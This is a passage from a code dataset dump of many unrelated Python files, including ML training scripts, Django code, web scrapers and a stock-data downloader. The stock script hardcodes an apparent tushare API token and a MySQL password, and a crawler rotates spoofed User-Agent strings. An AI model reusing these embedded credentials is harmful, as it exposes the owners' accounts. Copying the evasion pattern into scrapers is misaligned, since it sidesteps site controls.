#np.sum(disptr)/float(nv*nw)\nudv[:] = 100.\nudz[:] = 0.5\n\n# >> INVERSION\nalp = 0.5\nnit = 20\nivs, izl = inv.l2inv(vs, nu, ro, zt, curve[:,1], udisp, vs0, nu0, ro0, zl0, udv, udz, alp, nit, wmin, wmax, nw) \n","sub_path":"DIKES/script/L2_launch_save.py","file_name":"L2_launch_save.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"451601221","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 15 15:05:22 2020\n\n@author: raphaelbaena\n\"\"\"\n\nimport numpy as np\n\n\n\nfrom looti import datahandle as dhl\nfrom looti import automatic_validation as av\n#sns.set()\n\ndatafile_ext = \"Massive_Nus\"\ndatafile_LCDM = \"Massive_Nus_LCDM\"\noutputfolder = \"./data/\"\n\nemulation_data = dhl.DataHandle( datafile_ext, outputfolder,datafile_LCDM, \n num_parameters=3)\n \n\nemulation_data.read_csv_pandas(verbosity=2)\n\n\nemulation_data.calculate_ratio_by_redshifts(emulation_data.z_vals, normalize=True)\n\nlinkgrid = emulation_data.lin_k_grid\nmask = [k for k in np.where(linkgrid <10)[0] if k in np.where(linkgrid >0.1)[0]]\nGLOBAL_applymask = True\n\n\nthinning = 1\nmin_ntrain = 70\nmax_ntrain = 71\nwanted_ntest = 30\nPCA_dict_cross,PCA_dict_cros_all = av.cross_validation(emulation_data=emulation_data, wanted_ntest=wanted_ntest, n_vali=1,\n operator=\"DL\", max_train_size = max_ntrain ,min_train_size=min_ntrain,interp_type=\"GP\",number_of_splits=2)\n\nPCA_dict_cross.to_csv(\"./DL_MassiveNus_2.csv\")\n","sub_path":"scripts/DL_MassiveNus_validation_script_2.py","file_name":"DL_MassiveNus_validation_script_2.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426365024","text":"#! python3\n\n# 首先,创建一个待验证用户列表\n# 和一个用于存储已验证用户的空列表\nunconfirmed_users = ['alice', 'brain', 'candace']\nconfirmed_users = []\n\n# 验证每个用户,直到没有未验证用户为止\n# 将每个经过验证的列表都移到已验证用户列表中\nwhile unconfirmed_users:\n current_user = unconfirmed_users.pop()\n print(\"Verifying user: %s\" % (current_user.title()))\n confirmed_users.append(current_user)\n\n# 显示所有已验证用户\nprint(\"\\nThe following users have been confirmed: \")\nfor confirmed_user in confirmed_users:\n print(confirmed_user.title())\n","sub_path":"Section1_Getting_started/Chapter7/7.3.1_confirmed_users.py","file_name":"7.3.1_confirmed_users.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"630534518","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('categories', '0006_auto_20150726_0016'),\n ('statistics', '0010_auto_20151207_2213'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='nodeone',\n name='category',\n ),\n migrations.AddField(\n model_name='statnode',\n name='category',\n field=models.ForeignKey(related_name='StatNode_Category', default=None, to='categories.Category'),\n preserve_default=False,\n ),\n ]\n","sub_path":"statistics/migrations/0011_auto_20151207_2247.py","file_name":"0011_auto_20151207_2247.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399941725","text":"from __future__ import print_function\nimport keras\nimport sys\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n\nfrom FER2013_Input_Keras import FER2013_Input_Keras\nimport csv\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom numpy import array\nfrom scipy.misc import toimage\nfrom resizeimage import resizeimage\n\nbatch_size = 128\nnum_classes = 7\nepochs = int(sys.argv[1])\n\nimg_rows, img_cols = 84, 84\nfer = FER2013_Input_Keras('/home/alaa/Desktop/GP/', 2)\nTraining_labels, Training_Images = fer.FER2013_Training_Set()\nTesting_labels, Testing_Images = fer.FER2013_Testing_Set()\nValidation_labels, Validation_Images = fer.FER2013_Validation_Set()\nTraining_Images = Training_Images.reshape(Training_Images.shape[0], img_rows, img_cols, 1)\nValidation_Images = Validation_Images.reshape(Validation_Images.shape[0], img_rows, img_cols, 1)\nTesting_Images = Testing_Images.reshape(Testing_Images.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nTraining_Images = Training_Images.astype('float32')\nValidation_Images = Validation_Images.astype('float32')\nTesting_Images = Testing_Images.astype('float32')\nTraining_Images /= 255\nValidation_Images/=255\nTesting_Images /= 255\n\nTraining_labels = keras.utils.to_categorical(Training_labels, num_classes)\nValidation_labels = keras.utils.to_categorical(Validation_labels, num_classes)\nTesting_labels = keras.utils.to_categorical(Testing_labels, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(7, 7),\n activation='relu',\n input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(32, (5, 5), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (5, 5), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(3072, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=float(sys.argv[2]), decay=0.0, momentum=0.0, nesterov=False),\n metrics=['accuracy'])\n\nmodel.fit(Training_Images, Training_labels,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(Validation_Images, Validation_labels))\nscore = model.evaluate(Testing_Images, Testing_labels, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n'''\nmodel_json = model.to_json()\nwith open('model'+sys.argv[3]+'.json', \"w\") as json_file:\n json_file.write(model_json)\nmodel.save_weights('model'+sys.argv[3]+'_weights.h5')\nprint('Model Saved!')\n# load json and create model\njson_file = open('model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\n# evaluate loaded model on test data\nloaded_model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\nscore = loaded_model.evaluate(Testing_Images, Testing_labels, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n'''\n","sub_path":"FER2013_Model_Keras_Second_Scale.py","file_name":"FER2013_Model_Keras_Second_Scale.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416564094","text":"# coding=utf-8\n'''\n@Title:logistic-regression\n\n@Author: tyee.noprom@qq.com\n@Time: 7/14/16 9:47 PM\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef sigmoid(z):\n '''\n sigmoid函数\n :param z: z\n :return: sigmoid的值\n '''\n return 1.0 / (1 + np.exp(-z))\n\n\ndef plot_sigmoid():\n '''\n 绘制sigmoid函数图像\n :return:无\n '''\n # 创建一个从[-7, 7), 步长为0.1的数组\n z = np.arange(-7, 7, 0.1)\n phi_z = sigmoid(z)\n # 绘图\n plt.plot(z, phi_z)\n plt.axvline(0.0, color='k')\n plt.axhspan(0.0, 1.0, facecolor='1.0', alpha=1.0, ls='dotted')\n plt.axhline(y=0.5, ls='dotted', color='k')\n plt.yticks([0.0, 0.5, 1.0])\n plt.ylim(-0.1, 1.1)\n plt.xlabel('z')\n plt.ylabel('$\\phi (z)$')\n plt.show()\n","sub_path":"ch03/logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201568098","text":"\"\"\"Based on Plone Properties tool setup handlers. \"\"\"\n\nfrom zope.component import queryMultiAdapter\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.GenericSetup.interfaces import IBody\nfrom Products.GenericSetup.utils import XMLAdapterBase\nfrom Products.GenericSetup.utils import PropertyManagerHelpers\n\n_BASE = 'staticdumpertool.xml'\n_PROPERTIES = 'staticdumpertoolproperties.xml'\n\nclass DumperXMLAdapter(XMLAdapterBase, PropertyManagerHelpers):\n\n \"\"\"XML im- and exporter for Dumper tool properties.\n (Copied from Products.CMFCore.exportimport.properties.PropertiesXMLAdapter)\n \"\"\"\n\n _LOGGER_ID = 'staticdumpertool'\n\n def _exportNode(self):\n \"\"\"Export the object as a DOM node.\n \"\"\"\n self._encoding = self.context.getProperty('default_charset', 'utf-8')\n\n node = self._doc.createElement('dumpertool')\n node.appendChild(self._extractProperties())\n\n self._logger.info('StaticDumper properties exported.')\n return node\n\n def _importNode(self, node):\n \"\"\"Import the object from the DOM node.\n \"\"\"\n self._encoding = self.context.getProperty('default_charset', 'utf-8')\n\n for child in node.childNodes:\n if child.nodeName != 'property':\n continue\n if child.getAttribute('name') != 'default_charset':\n continue\n self._encoding = self._getNodeText(child) or 'utf-8'\n break\n\n # Raise an error on 'dumper' property. Why?\n #if self.environ.shouldPurge():\n #self._purgeProperties()\n\n self._initProperties(node)\n\n self._logger.info('StaticDumper properties imported.')\n\ndef importStaticDumper(context):\n \"\"\" Import staticdumper tool.\n \"\"\"\n site = context.getSite()\n logger = context.getLogger('staticdumpertool')\n ptool = getToolByName(site, 'portal_dumper', None)\n\n if ptool is None:\n logger.info('Nothing to import.')\n return \n\n # tool\n body = context.readDataFile(_BASE)\n if body is None:\n logger.info('Nothing to import.')\n return\n\n importer = DumperXMLAdapter(ptool, context)\n importer.body = body\n\n # property sheets\n body = context.readDataFile(_PROPERTIES)\n if body is None:\n logger.info('Nothing to import.')\n return\n\n importer = queryMultiAdapter((ptool, context), IBody)\n if importer is None:\n logger.warning('Import adapter missing.')\n return\n\n importer.body = body\n logger.info('StaticDumper dumpers properties imported.')\n\n logger.info('StaticDumper tool imported.')\n\ndef exportStaticDumper(context):\n \"\"\" Export staticdumper tool.\n \"\"\"\n site = context.getSite()\n logger = context.getLogger('staticdumpertool')\n ptool = getToolByName(site, 'portal_dumper', None)\n if ptool is None:\n logger.info('Nothing to export.')\n return\n\n # tool\n exporter = DumperXMLAdapter(ptool, context)\n context.writeDataFile(_BASE, exporter.body, exporter.mime_type)\n\n # property sheets\n exporter = queryMultiAdapter((ptool, context), IBody)\n\n if exporter is None:\n logger.warning('Export adapter missing.')\n return\n\n context.writeDataFile(_PROPERTIES, exporter.body, exporter.mime_type)\n logger.info('StaticDumper properties exported.')\n\n logger.info('StaticDumper tool exported.')\n","sub_path":"packages/oops.staticdump/branches/book-dumpers-removal/oops/staticdump/exportimporttool.py","file_name":"exportimporttool.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"62126219","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 23 11:37:55 2020\n\n@author: malcolmmccabe\n\"\"\"\n\n\"\"\"\nPurdue v. Virginia Data Analysis\n\"\"\"\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\nimport os\nimport nltk\nfrom collections import Counter \nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\n#Read in CSV as dataframe. Remove first column\ndf = pd.read_csv('PurdueData.csv')\n\n#Remove last column \ndf = df[:-1]\n\n'''\ncolumn_list1 = ['PTS']\ndf[column_list1].plot(kind='bar')\nplt.show()\n'''\nfile = open(\"/Users/malcolmmccabe/Desktop/Python File/Text Files/VirginiaVSPurdue.txt\", 'r')\nmyfile = file.read()\n\n#Split file into words\ntokens = nltk.word_tokenize(myfile)\n\n#Normalize words by lowercasing all\nlower_tokens = [w.lower() for w in tokens]\n\n#Eliminate non-alpha tokens\nalpha_only = [t for t in lower_tokens if t.isalpha()]\n\n#Eliminate stop words \nno_stops = [t for t in alpha_only if t not in stopwords.words('english')]\n\n#Instantiate WordNetLemmatizer\nwnl = WordNetLemmatizer()\n\n#Lemmatize tokens\nlemmatized = [wnl.lemmatize(t) for t in no_stops]\n\n#Count tokens \nbow = Counter(lemmatized)\n\n#Print 10 most common \n#print(bow.most_common(50))\n\n#problems with doing this: sometimes first and last name is said at same time,\n#so we are double counting. \n#closed captions don't always spell players' names correclty \n\nnames_dict = {}\n \nfor k,v in bow.items():\n if k == 'edward' or k == 'carson':\n names_dict['Carsen Edwards'] = bow.get('edward') + bow.get('carson')\n \n if k == 'ryan' or k == 'klein':\n names_dict['Ryan Cline'] = bow.get('ryan') + bow.get('klein')\n \n if k == 'matt' or k == 'harm':\n names_dict['Matt Haarms'] = bow.get('matt') + bow.get('harm')\n \n #this one was tough - no jail, no jelly \n if k == 'eastern':\n names_dict['Nojel Eastern'] = bow.get('eastern')\n \n if k == 'grady' or k == 'eyford':\n names_dict['Grady Eifert'] = bow.get('grady') + bow.get('eyford')\n \n if k == 'aaron' or k == 'wheeler':\n names_dict['Aaron Wheeler'] = bow.get('aaron') + bow.get('wheeler')\n \n if k == 'treyvion' or k == 'williams':\n names_dict['Trevion Williams'] = bow.get('treyvion') + bow.get('williams')\n \n #problems with this one is there is another hunter\n if k == 'eric' or k == 'hunter': \n names_dict['Eric Hunter Jr.'] = bow.get('eric') + bow.get('hunter')\n \n if k == 'sasha' or k == 'stefanovic':\n names_dict['Sasha Stefanovic'] = bow.get('sasha') + bow.get('stefanovic')\n \n\nprint(names_dict)\n\n#Maps dictionary values with players in dataframe\ndf['Times_Name_Said'] = df['Starters'].map(names_dict)\n\nprint(df)\n\n#Bar Graph with axis set equal to Times Name Said and Minutes Played\nbar_graph = plt.figure()\n\nax = bar_graph.add_subplot(111)\nax2 = ax.twinx()\n\nwidth = 0.3\n\ndf.MP.plot(kind='bar', color='red', ax=ax, width=width, position=1)\ndf.Times_Name_Said.plot(kind='bar', color='blue', ax=ax2, width=width, position=0)\n\nax.set_ylabel('Minutes Played')\nax2.set_ylabel('Times Name Said')\nax.set_xticklabels(df['Starters'])\n\nplt.show()\n\nteam_dict = {}\n\nfor k,v in bow.items():\n if k == 'virginia':\n team_dict['Virginia'] = bow.get('virginia')\n \n if k == 'perdue' or k == 'purdue':\n team_dict['Purdue'] = bow.get('purdue') + bow.get('perdue')\n\nprint(team_dict)\n\n","sub_path":"Malcolm/Analysis_Practice/DataAnalysis_NCAA.py","file_name":"DataAnalysis_NCAA.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343445885","text":"##Cantidad de vocales\n\n#Declaramos nuestras listas y variables necesarias\nlista = []\nnumA = 0\nnumE = 0\nnumI = 0\nnumO = 0\nnumU = 0\n\nA = False\nE = False\nI = False\nO = False\nU = False\n\n#El string que se ingresa lo casteamos a lista y separamos cada caracter\nprint(\"Ingresa tu frase\")\nstring = input()\nstring = string.split()\n#print(string)\nnewstring = \"\".join(string)\n#print(newstring)\nnewstring = newstring.lower()\nnewstring = list(newstring)\n\n#print(lista)\n\nlargoString = len(newstring)\n\nfor i in range(largoString):\n\n\t#print(i)\n\n\tif newstring[i] == 'a':\n\n\t\tnumA = numA + 1\n\n\t\tA = True\n\n\telif newstring[i] == 'e':\n\n\t\tnumE = numE + 1\n\n\t\tE = True\n\n\n\telif newstring[i] == 'i':\n\n\t\tnumI = numI + 1\n\n\t\tI = True\n\n\n\telif newstring[i] == 'o':\n\n\t\tnumO = numO + 1\n\n\t\tO = True\n\n\n\telif newstring[i] == 'u':\n\n\t\tnumU = numU + 1\n\n\t\tU = True\n\n\n\nprint(\"Frecuencia de las Vocales\")\n\nif A == True:\n\tprint(\"A -> \", numA)\nif E == True:\n\tprint(\"E -> \", numE)\nif I == True:\n\tprint(\"I -> \", numI)\nif O == True:\n\tprint(\"O -> \", numO)\nif U == True:\n\tprint(\"U -> \", numU)\n","sub_path":"Practicas/Clase3/prueba/freqVocales.py","file_name":"freqVocales.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202604953","text":"#! python3\n\"\"\"Write a program that opens all .txt files in a folder and searches for\nany line that matches a user-supplied regular expression.\nThe results should be printed to the screen.\"\"\"\n\nimport os\nimport re\n\n\ndef search_the_dir(dir_path, pattern):\n \"\"\"Open all text files in a directory and look for given regular expression.\"\"\"\n for file in os.listdir(dir_path):\n if file.endswith('.txt'):\n file_path = os.path.join(dir_path, file)\n with open(file_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if re.findall(pattern, line):\n print(f'{file_path}: {line}')\n\ndef main():\n user_path = input(\"Type the path to folder you'd like to search through:\\n\")\n dir_path = r'{}'.format(user_path)\n user_pattern = input('Type the regular expression to be looked for:\\n')\n pattern = re.compile(r'{}'.format(user_pattern))\n search_the_dir(dir_path, pattern)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"Chapter_08-Reading_and_Writing_Files/regex_search.py","file_name":"regex_search.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245375027","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.cross_validation import train_test_split\nimport numpy\nimport pickle\nimport csv\nfrom scipy import stats\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.grid_search import RandomizedSearchCV\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.externals import joblib\n\n\n\ndef writeToCSV(answer):\n with open('GradientBoostinglog.csv', 'wb') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=',',)\n spamwriter.writerow(['Id','Action'])\n for item in range(len(answer)):\n spamwriter.writerow([item+1,answer[item]])\n\ndef getPercent(guess,correct):\n totalMiss = 0\n for i in range(len(guess)):\n if guess[i]!=correct[i]:\n #print(guess[i], correct[i])\n totalMiss+=1\n\n\n return (float(totalMiss)/len(guess))\n\n\ndef matrixFromCSV(path):\n csvFile = open(path).read().split(\"\\n\")\n vals = csvFile[1:]\n listOfVals = []\n listOfActions = []\n highest = [312153, 311696, 311178, 286791, 286792, 311867, 311867, 308574, 270691]\n for elem in vals:\n stringVals = elem.split(\",\")[1:]\n intVals = numpy.array([float(stringVals[i])/highest[i] for i in range(len(stringVals))])\n #intVals.reshape(9,1)\n if len(intVals)!=0:\n listOfVals.append(intVals[:-2])\n try:\n listOfActions.append(int(elem.split(\",\")[0]))\n except:\n pass\n return numpy.array(listOfVals), numpy.array(listOfActions) \n\ndef main():\n vals, actions = matrixFromCSV(\"C:\\\\Users\\\\Chrisd\\\\Documents\\\\College\\\\Spring 2016\\\\379K\\\\Kaggle\\\\Kaggle\\\\train.csv\")\n X_train, X_test, y_train, y_test = train_test_split(vals, actions, test_size=0.33, random_state=22)\n totalTest, totalAns = matrixFromCSV(\"C:\\\\Users\\\\Chrisd\\\\Documents\\\\College\\\\Spring 2016\\\\379K\\\\Kaggle\\\\Kaggle\\\\test.csv\")\n #test = RandomForestClassifier(max_depth=20, n_estimators=15, max_features=5)\n clf = GradientBoostingClassifier()\n param_dist = [{\"loss\":['deviance',], \"learning_rate\":[.12,.1,.08], \"n_estimators\":[100], \"subsample\":[1.0], \n \"min_samples_split\":[2], \"min_samples_leaf\":[1], \"min_weight_fraction_leaf\":[0.0], \"max_depth\":[10], \n \"init\":[None], \"random_state\":[None], \"max_features\":[None, \"auto\",], \"verbose\":[0], \"max_leaf_nodes\":[None], \"warm_start\":[False], \"presort\":['auto']}\n ]\n random_search = GridSearchCV(clf, param_grid=param_dist,\n cv=5, n_jobs=3, verbose=50, scoring='roc_auc')\n random_search.fit(X_train,y_train)\n joblib.dump(random_search, 'GradientBoostinglog.pkl')\n random_search = joblib.load('GradientBoostinglog.pkl')\n print(random_search.best_estimator_)\n #print(random_search.grid_scores_)\n print(random_search.best_score_)\n writeToCSV(random_search.predict_proba(X_test)[:,1])\n print(random_search.score(X_test,y_test))\n\nif __name__ == '__main__':\n main()","sub_path":"GradientBoostingModel.py","file_name":"GradientBoostingModel.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23946590","text":"import getopt\nimport sys\nimport app.db.connection as con\nimport regex\n\nfrom requests_html import HTMLSession\nfrom app.db.config import db_config\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup, Comment\nfrom app.model.city import City\nfrom psycopg2 import IntegrityError, ProgrammingError\n\ndef parse_city(details_link, name):\n # 3. Get details url\n details_html = urlopen(details_link)\n soup_details = BeautifulSoup(details_html.read(), 'html5lib')\n if soup_details:\n\n # IF Details page will fail\n print('Crawling deatils page: %s' % details_link)\n try:\n details_table = soup_details.find('table', attrs={'class': 'wikitable float-right'}).find('tbody')\n except Exception as e:\n print('Failed due to: %s' % e.__cause__)\n\n detail_rows = details_table.findAll('tr')\n\n canton = detail_rows[3].findAll('td')[1].find('a')\n if canton:\n canton = canton.getText()\n\n state = detail_rows[4].findAll('td')[1].find('a')\n if state:\n state = state.getText()\n\n postal_codes = details_table.find('a', title=regex.compile('.*Postleitzahl.*')).parent.parent.findAll('td')[1]\n if postal_codes:\n postal_codes = postal_codes.getText()\n postal_codes = regex.findall(r'\\d{4}', postal_codes)\n\n for postal_code in postal_codes:\n coords_link = details_table.find('span', attrs={'class': 'coordinates'})\n lat = None\n lng = None\n if coords_link:\n coords_link = coords_link.find('a', attrs={'class': 'external text'})\n if coords_link:\n coords_link = coords_link.get('href')\n lat = regex.findall(r'(?<=params=)(.*)(?=\\_N)', coords_link)[0]\n lng = regex.findall(r'(?<=\\_N_)(.*)(?=\\_E)', coords_link)[0]\n\n website = details_table.find('a', href=regex.compile('.*www.*'))\n if website:\n website = website.getText()\n\n existing_city = City.find_by_postal_code_and_alpa_2_code(postal_code=postal_code, alpha_2_code='CH')\n if existing_city is not None:\n existing_city.name = name\n existing_city.website = website\n print('Updating City name:%s and postal_code:%s' % (existing_city.name, existing_city.postal_code))\n try:\n existing_city.update()\n except IntegrityError as e:\n print(e)\n except ProgrammingError as e:\n print(e)\n else:\n new_city = City(postal_code=postal_code, name=name, state=state, latitude=lat,\n longitude=lng, canton=canton, website=website,\n alpha_2_code='CH', country='Schweiz')\n print('Creating City name:%s and postal_code:%s' % (new_city.name, new_city.postal_code))\n try:\n new_city.insert()\n except IntegrityError as e:\n print(e)\n except ProgrammingError as e:\n print(e)\n print(new_city.__dict__)\n\ndef parse_cities():\n # First clear cities in database\n alphabet = list(map(chr, list(range(65, 91))))\n\n # 1. Iterate through all city lists\n for char in alphabet:\n html = urlopen('https://de.wikipedia.org/wiki/Gemeinden_der_Schweiz-%s' % char)\n soup = BeautifulSoup(html.read(), 'html5lib')\n\n cities_table = soup.find('table', attrs={'class': 'wikitable'})\n if cities_table:\n cities_table = cities_table.find('tbody')\n city_entries = cities_table.findAll('tr')\n else:\n cities_table = soup.find('ul')\n city_entries = cities_table.findAll('li')\n\n for city_row in city_entries:\n details_url = city_row.find('a', href=True)\n if not isinstance(city_row, Comment) and details_url is not None:\n # 2. Iterate through all cities\n name = details_url.getText()\n details_url = details_url.get('href')\n if details_url:\n parse_city('https://de.wikipedia.org%s' % details_url, name=name)\n\ndef main():\n argv = sys.argv\n try:\n opts, args = getopt.getopt(argv[1:], 'd:', ['db='])\n except getopt.GetoptError:\n sys.exit(2)\n\n # Setup DB environment\n env = list(filter(lambda x: x[0] in ('-d', '--db'), opts))\n if env and len(env) > 0:\n env = env[0][1]\n else:\n env = next(iter(db_config.keys()))\n\n con.set_db_config(db_config[env])\n\n parse_cities()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/swiss_locations.py","file_name":"swiss_locations.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"147529687","text":"\"\"\"\n author: Shawn\n time : 7/21/18 5:25 PM\n desc : 采集猫眼评论信息\n update: Shawn 7/21/18 5:25 PM\n\"\"\"\n\nimport requests\nimport json\nimport time\nimport random\n\nagents = [\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',\n 'chrome/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ucbrowser/64.0.3282.140 Safari/537.36',\n 'safri/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',\n 'ucbrowser/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) webkit/64.0.3282.140 Safari/537.36',\n 'Mozilla',\n]\n\n\n# 下载第一页数据\ndef get_one_page(url):\n headers = {\n 'Host': 'm.maoyan.com',\n 'User-Agent': random.choice(agents)\n }\n\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n print('body: %s' % response.text)\n return response.text\n\n return None\n\n\n# 解析第一页数据\ndef parse_one_page(html):\n data = json.loads(html)['cmts']\n\n for item in data:\n yield {\n 'comment': item['content'],\n 'date': item['time'].split(' ')[0],\n 'rate': item['score'],\n 'city': item['cityName'],\n 'nickname': item['nickName']\n }\n\n\n# 保存数据到文本文档\ndef save_to_txt():\n for i in range(1, 1001):\n print('start...')\n url = 'http://m.maoyan.com/mmdb/comments/movie/248566.json?_v_=yes&offset=' + str(i)\n # url = 'http://www.baidu.com'\n html = get_one_page(url)\n print('正在保存第 %d 页。' % i)\n\n for item in parse_one_page(html):\n with open('old.txt', 'a', encoding='utf-8') as f:\n f.write(\n item['date'] + ',' + item['nickname'] + ',' + item['city'] + ',' + str(item['rate']) + ',' + item[\n 'comment'] + '\\n')\n\n # time.sleep(0.1 + float(random.randint(1, 100)) / 20)\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n save_to_txt()\n","sub_path":"src/demo/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164350294","text":"#!/usr/bin/python3\n# coding:utf-8\n# -*- coding: utf-8 -*-\n\nimport time\nimport datetime\nimport random\n\nimport tushare\nimport pandas\n#import pymssql\n#import sqlalchemy\n#import mysql.connector\nimport sqlalchemy\nimport pymysql\n\n\n\n#需修改的参数\nstock_list_file = 'd:/stock_list.csv'\ndatabasename = 'msstock'\nsqlenginestr='mysql+pymysql://pyuser:Pyuser18@127.0.0.1/'+databasename+'?charset=utf8mb4'\ndatabasename = 'msstock'\n#tushare token\ntushare_token='e239683c699765e4e49b43dff2cf7ed7fc232cc49f7992dab1ab7624'\n\n#股票列表\ndef initiate():\n #初始化tushare\n tushare.set_token(tushare_token)\n engine=sqlalchemy.create_engine(sqlenginestr)\n return engine\n\ndef get_stock_basic(engine = sqlenginestr,schema = databasename):\n print('start to download stock_basic data') \n pro = tushare.pro_api()\n df = pro.stock_basic(fields='ts_code,symbol,name,area,industry,fullname,cnspell,market,exchange,curr_type,list_status,list_date,delist_date,is_hs')\n try:\n pandas.io.sql.to_sql(frame=df, name='tb_stock_basic', con=engine, schema= schema, if_exists='replace', index=True) \n except:\n print('To SQL Database Failed')\n finally:\n pass\n print('download stock_basic data successed!')\n return 1\n\ndef get_trade_cal(engine = sqlenginestr,schema = databasename):\n print('start to download trade_cal data') \n date_now = datetime.datetime.now().strftime('%Y%m%d')\n pro = tushare.pro_api()\n df = pro.trade_cal(start_date='20200101', end_date=date_now, fields='exchange,cal_date,is_open')\n try:\n pandas.io.sql.to_sql(frame=df, name='tb_trade_cal', con=engine, schema= schema, if_exists='replace', index=True) \n except:\n print('To SQL Database Failed')\n finally:\n pass\n print('download trade_cal data successed!')\n return 1\n\n\n#全量下载所有股票列表数据\nif __name__ == '__main__':\n print('开始')\n engine = initiate()\n print('获取列表...')\n get_stock_basic(engine,databasename)\n get_trade_cal(engine,databasename)\n print('结束')\n","sub_path":"Rabbit/getstockbasic.py","file_name":"getstockbasic.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320396","text":"from django.conf.urls import url\r\nfrom discussion import views\r\n\r\nurlpatterns = [\r\n url(r'^comments/(?P[0-9]+)/$',\r\n views.CommentDetail.as_view(),\r\n name='comment-detail'),\r\n url(r'^$',\r\n views.DiscussionList.as_view(),\r\n name='discussion-list'),\r\n url(r'^(?P[0-9]+)/$',\r\n views.DiscussionDetail.as_view(),\r\n name='discussion-detail'),\r\n url(r'^(?P[0-9]+)/comments/$',\r\n views.DiscussionComments.as_view(),\r\n 